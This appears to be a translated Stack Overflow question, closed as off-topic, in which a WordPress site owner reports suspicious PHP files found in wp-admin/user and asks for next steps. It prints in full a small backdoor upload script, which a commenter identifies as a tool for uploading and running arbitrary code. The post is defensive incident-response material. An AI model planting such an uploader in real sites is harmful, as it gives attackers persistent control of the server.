在WordPress项目中的服务器上发现可疑文件('wp-admin/user')[已关闭]

Suspicious files found on server in WordPress project ('wp-admin/user') [closed]

提问人:PatrykBochenek 提问时间:11/7/2023 最后编辑:Peter MortensenPatrykBochenek 更新时间:11/8/2023 访问量:62

问:

这个问题似乎与帮助中心定义的范围内的编程无关。

12天前关闭。

改进此问题

今天早上,我在 WordPress wp-admin/user 目录中的服务器上遇到了一些可疑文件:

文件评论-zk9YV7.php

<?php
if(move_uploaded_file($_FILES["Wpfl"]["tmp_name"], basename($_FILES["Wpfl"]["name"]))){
    echo (basename($_FILES["Wpfl"]["name"])."    Success");
}
echo "<form enctype=\"multipart/form-data\" method=\"POST\">
<input type=\"file\" name=\"Wpfl\"/>
<input type=\"submit\" value=\"fup\"/>
</form>
</br>task is done!";
?>

还有一个文件,comment-JR9hng.php,由相同的代码组成。

几周前,我一直怀疑存在违规行为,虽然这个文件本身似乎有些无害,但我不禁想象有更大的事情正在发生。

从那以后,我检查了服务器,什么也没发现,但也许我没有找对地方。我的理论是,由于其中一位WordPress管理员的密码非常弱,因此访问了WordPress管理员。大约一周前,我们也收到了一堆来自 WordPress 后端的垃圾邮件帖子,宣传了一些骗局和恶意链接。我怀疑这又是由于非常容易猜到的密码。

我能做些什么?有没有一些指示下一步要看?

php wordpress 安全 恶意软件 websecurity

评论

3赞 hanshenrik 11/7/2023
该文件不是无害的,它是一个后门脚本上传器。有了它,攻击者可以上传和执行任意代码
2赞 hanshenrik 11/7/2023
我投票关闭这个问题,因为这个问题不属于 StackOverflow.com。也许它属于 wordpress.stackexchange.comsecurity.stackexchange.comserverfault.com,但它不属于 stackoverflow.com
2赞 Greenonline 11/7/2023
@hanshenrik - 我会说 Wordpress 是它的最佳场所,因为在黑客攻击后要寻找的恶意代码字符串和验证我是否已完全删除 WordPress 黑客攻击?似乎相关。
0赞 Joachim 11/7/2023
@hanshenrik 为什么它完全偏离主题?它似乎符合 [security] 标签。
1赞 Chris Haas 11/7/2023
这通常被认为是偏离主题的原因是,我们真的没有什么具体的事情可以提供帮助。我们可以说“检查 XYZ”、打开日志记录、从备份恢复等,但它们只是在黑暗中拍摄。有一个关于它的元,以及一个高级的“我如何处理受感染的服务器”

答: 暂无答案

上一个:vb.net 应用程序在由其他程序启动时无法访问 my.settings

下一个:如何从安全的 SSoT 容器为 aws_db_instance 资源设置退出前的密码,同时将其保留在状态文件之外?